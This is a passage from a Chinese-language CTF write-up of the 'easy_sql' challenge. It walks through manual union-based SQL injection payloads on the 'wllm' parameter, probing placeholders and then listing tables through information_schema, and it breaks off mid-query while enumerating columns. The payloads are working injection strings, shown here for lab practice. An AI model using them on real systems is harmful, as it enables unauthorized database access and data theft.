[SWPUCTF 2021 新生赛]easy_sql
一、思路分析
这题可以直接参考:[NISACTF 2022]join-us - 报错注入&无列名注入
网站标题提示,参数是wllm
?wllm=1
得到:Your Login name:xxx Your Password:yyy
二、解题方法
解法一:手注
1、先尝试普通注入?wllm=-1'union select 1,2,3--+
得到:Your Login name:2 Your Password:3
这里注意,wllm=-1才会回显占位符,否则还是xxx yyy
2、?wllm=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = database()),3--+
得到:Your Login name:test_tb,users
3、?wllm=-1'union select 1,(select group_concat(column_name) from information_schema.columns